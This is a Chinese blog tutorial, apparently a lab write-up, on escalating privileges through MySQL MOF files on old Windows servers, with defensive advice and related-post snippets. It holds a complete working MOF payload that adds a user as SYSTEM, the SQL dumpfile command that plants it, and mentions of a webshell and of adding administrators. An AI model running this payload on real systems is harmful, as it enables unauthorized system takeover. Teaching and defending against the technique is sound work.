mysql mof提权_MySQL_MOF提权

最新推荐文章于 2023-10-07 16:38:19 发布
最新推荐文章于 2023-10-07 16:38:19 发布
阅读量325 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: mysql mof提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32148341/article/details/113432046
本文详细介绍了MySQL MOF提权的原理、前提条件、提权步骤,包括实验环境设置、利用方法和代码示例。同时,文章给出了针对这种提权方式的安全防范建议,如限制数据库目录权限、禁止MOF文件写入等。最后,作者提醒读者关注相关MySQL提权技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、原理

Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件:

将MOF文件执行为命令行参数及Mofcomp.exe文件

使用IMofCompiler接口和$CompileFile方法

拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹下的MOF文件中

托管对象格式(MOF)文件在 C:\Windows\System32\wbem\MOF 目录下,它是创建和注册提供程序、事件类别和事件的简便方法。其作用是每隔五秒就会去监控进程创建和死亡。那么只需要将恶意代码写入该文件中即可提权。

二、前提

mysql5.7 开始默认使用 secure-file-priv 选项,不能随意选择导出路径,所以 mof 提权仅适用于以下条件:

操作系统版本低于 win2008

数据库为 mysql<5.7 且知道登录账号密码并且允许外连

总结来说就是当前 root 账户可以复制文件到 %SystemRoot%\System32\wbem\MOF 目录下。

三、提权

3.1实验环境

攻击机:win10  ip:192.168.34.1

靶机:win2003  ip:192.168.34.131

攻击机在靶机写入一句话木马,蚁剑连接。

3.2利用方法

先 select version(); 判断数据库版本,小于 5.7 可以利用 mof 提权。

3c5a103328da41ac1b5574fb1df00985.png

将以下代码保存为 test.mof 文件,修改第 17 行代码为添加一个普通用户命令。

1 #pragma namespace("\\.\root\subscription")

2 instance of __EventFilter as$EventFilter3 {4 EventNamespace = "Root\\Cimv2";5 Name = "filtP2";6 Query = "Select * From __InstanceModificationEvent"

7 "Where TargetInstance Isa \"Win32_LocalTime\""

8 "And TargetInstance.Second = 5";9 QueryLanguage = "WQL";10 };11

12 instance of ActiveScriptEventConsumer as$Consumer13 {14 Name = "consPCSV2";15 ScriptingEngine = "JScript";16 ScriptText =

17 "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user moftest mof.test /add\")";18 };19

20 instance of __FilterToConsumerBinding21 {22 Consumer =$Consumer;23 Filter =$EventFilter;24 };

上传该文件到服务器上任意位置,再通过 mysql 语句将文件导入。

select load_file('C:/phpStudy/WWW/test.mof') into dumpfile 'C:/WINDOWS/system32/wbem/mof/test.mof';

执行导入命令失败,SHOW VARIABLES LIKE "secure_file_priv"; 命令查看当前 secure_file_priv。

32b13250b94506738d78e89f2cb3ded7.png

为了实验看一下效果,靶机 my.ini 添加一行 secure_file_priv = 代表不限制目录,重启 mysql 再执行一次导入命令。

导入后,系统会自动运行该文件,可以再修改第 17 行代码进行添加管理员等操作。由于 mof 是由 system 执行,所以权限满足创建用户、添加管理员等操作,即可完成提权过程。

四、防范

尽量不要使用 root 账号连接数据库

root 账号使用强加密方式

对 mysql 数据库目录权限严格限制

操作系统目录 C:\Windows\System32\wbem 禁止写入

如果服务器发现被使用 mof 提权,解决循环创建用户方法:

打开 cmd 使用命令:net stop winmgmt

删除文件夹下内容 C:\Windows\System32\wbem\Repository

再执行 net start winmgmt 即可

五、总结

这篇随笔和上一篇MySQL_UDF提权 https://www.cnblogs.com/wkzb/p/13174291.html 都是MySQL提权方式的小总结,如果有错误欢迎师傅们批评指正。

参考:

操作系统升(二十七)之数据库-MySQL MOF
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-22 667
mof是windows系统的一个“托管对象格式”文件(位置:C:/windows/system32/wbem/mof/),其作用是每隔五秒就会去监控进程创建和死亡,mof目录下有两个文件夹(good与bad)。Windows server 2003及以下系统每5秒会执行一次mof目录下的文件,执行成功会移动到good文件夹,执行失败则会移动到bad文件夹。注:MOF权只能用于Windows系统,Linux无法使用。
mysql mof_MySQLmof
weixin_42498989的博客
01-19 790
mof原理关于 mof 的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 的过程!MOF的条件要求十分严苛:1.windows 03及以下版本2.mysql启动身份具有限去读写c:/windows...
Mysql——mof
Zlirving_的博客
06-08 2353
mof 原理 在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以system限执行一次,所以,只要我们将想要的操作通过代码存储到这个mof文件中,就可以实现升   利用条件 仅限windows 及适用于windows server2003及以下的版本 mysql用户具有root限(对上面那个目录可写) 关闭了secure-file-priv   利用方式 拿下webshell之
Mysql-mof
告白的博客
08-14 502
0x00 mof原理 类似于之前的udf,参考https://blog.csdn.net/qq_53577336/article/details/119700116 另外一种mysql方式叫做mof 在windows系统下 (在c:/windows/system32/wbem/ mof /nullevt. mof)存在一个mof文件,他的特点是,每个极短一段时间,便会以system限自动运行文件内脚本,mof就是将我们写好的mof文件导入到该目录该文件里门,让他自行执行我们的语句,达到
mysqlmof详解
weixin_30376323的博客
01-23 241
原理解读: Windows 管理规范 (WMI) 供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法1:运行MOF文件指定为命令行参数将Mofcomp.exe文件。方法2:使用IMofCompiler接口和$CompileFile方法。方法3:拖放到%SystemRoot%\System32\Wbem\MOF文件夹的...
数据库--MOFMYSQL
qq_45936617的博客
10-07 883
MOF的利用原理是利用目录下的 nullevt.mof 文件,每隔一段时间(默认5s)都会用系统限执行一次的特性,来写入cmd命令使其被带入以系统限执行MOF的使用条件是:1、secure_file_priv参数不为null2、有修改nullevt.mof 文件的限3、数据库用户具有rootMOF的步骤是有恶意语句的mof文件写入到mof目录下-->系统每隔一段时间自动执行。
Mysql方法总结系列-MOF
kracer的博客
02-27 3451
0x01 简介 mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root限了以后,然后使用root限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 0x02 条件 mysql有读写 C:/Windows/system32/...
113.网络安全渗透测试—[升篇11]—[Windows 2003 Mysql MOF]
qwsn
07-06 2243
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! mof是windows系统的一个文件,存储在,叫做"托管对象格式",其作用是每隔五秒就会去监控进程创建和死亡。然而的原理就是在拥有了mysql的root限以后(其实就是获得了MySQL的启动身份),然后使用该限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs脚本段大多数写的是cmd的添加管理员用户的命令。(1)操作系统版本:Windows Server
mysql mof原理_mof原理及其过程
05-16
Mof的原理是通过创建一个恶意的Mof文件,并将其注册到WMI中,然后利用WMI的执行限来执行Mof文件中的命令,从而实现。具体过程如下: 1. 创建一个恶意的Mof文件,并将其中的类名定义为“__EventFilter”,...
mysqlmof
最新发布
03-26
嗯,用户想了解如何通过MySQL MOF进行操作。我需要先回忆一下相关的知识,然后结合供的引用内容来组织回答。 首先,MOF是什么?我记得MOF文件是Windows管理规范的一部分,用于系统管理。当系统处理特定的...
mof文件nullevt.mof
03-12
其就是用又了mysql的root限了以后,然后使用root限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp....
MySQLmof
2301_77300311的博客
04-11 750
关于 mof 的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。MOF文件每五秒就会执行,而且是系统限,我们通过mysql使用load_file 将文件写入/wbme/mof,然后系统每隔五秒就会执行一次我们上传的MOF。我们成功后,就算被删号,mof也会在五秒内将原账号重建,那么这给我们退出测试造成了很大的困扰,所以谨慎使用。
mysql mof
m0_65096687的博客
05-23 344
mof 的原理就是利用mof目录下的mof文件会一段时间后自动执行,且限为system,我们就利用此处的。让他执行一些我们想要的命令。2、数据库为 mysql
mysqlmof
Clannad的博客
11-17 561
文章目录靶机 Server 2003use exploit/windows/mysql/mysql_mof查看需要配置的参数配置参数输入 run 或者 exploit 来执行成功拿到meterpreter回显之后,输入shell,拿下shell开启和关闭3389端口 靶机 Server 2003 use exploit/windows/mysql/mysql_mof 使用use 来调用此模块 记...
数据库mysql_MOF
qq_45300786的博客
05-24 229
mysql——mof 脚本 https://blog.csdn.net/weixin_36462845/article/details/113592918 mysql——mof 脚本2 https://www.cnblogs.com/xishaonian/p/6384535.html mysql——mof 16进制 https://blog.csdn.net/cxrpty/article/details/104805108?utm_medium=distribute.pc_relevant.no
(新安全原创精华)Mysql扩展文件MOF详讲
甲方乙方
08-12 6779
哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了。 希望大家可以支持我们,我们也会做得更好。无论是批评还是鼓励我们一样接受。 【MYSQLMysql扩展文件MOF详讲 【原理】在c:/windows/system32/wbem/mof/目录下的nullevt.mof每分钟都会有一个特定的时间去执行一次(由"And TargetIn
mysql mof_mof
weixin_33511821的博客
02-01 358
第一次接触,先看了个最简单的,哈哈哈哈,看了几个视频和文章,然后整理了一下,估计很多不对的地方,等真正了解了就回来改掉。原理mof是Windows系统的一个文件,位于c:windowssystem32wbemmofnullevt.mof,叫做托管对象格式,它的作用是每隔5秒,就会去监控进程的创建和死亡。mof的简单利用过程就是,拥有了MySQL的root限后,使用root限去执行上传操...
mysql mof_三、mysqlmof学习
weixin_32097465的博客
01-27 252
一、测试环境win2003 + phpnow二、使用条件mysql + root限三、工具准备(1)工具1: 准备好mof脚本(具体mof脚本,已上传网盘)(2)工具2: 准备好菜刀(文件管理 + 数据库管理)四、原理上传mof脚本到mof默认加载目录(路径:c:/windows/system32/wbem/mof),系统会在每一分钟的某一个固定时间运行mof目录下的mof脚步文件,...
[WEB安全]MySQl mof、udf过程详解
网络安全知识分享
12-17 3516
MySQL〇、Mysql的必备条件1、Mysql密码查询2、利用ntfs特性创建文件夹3、常用的sql基础查询命令一、mof0、环境搭建1、原理2、条件3、开始4、删号二、UDF0、原理1、步骤2、实操 〇、Mysql的必备条件 Mysql的服务没有降,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降 1、Mysql密码查询 1、root密码查询 # MySQL <= 5.6 版本 selec
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值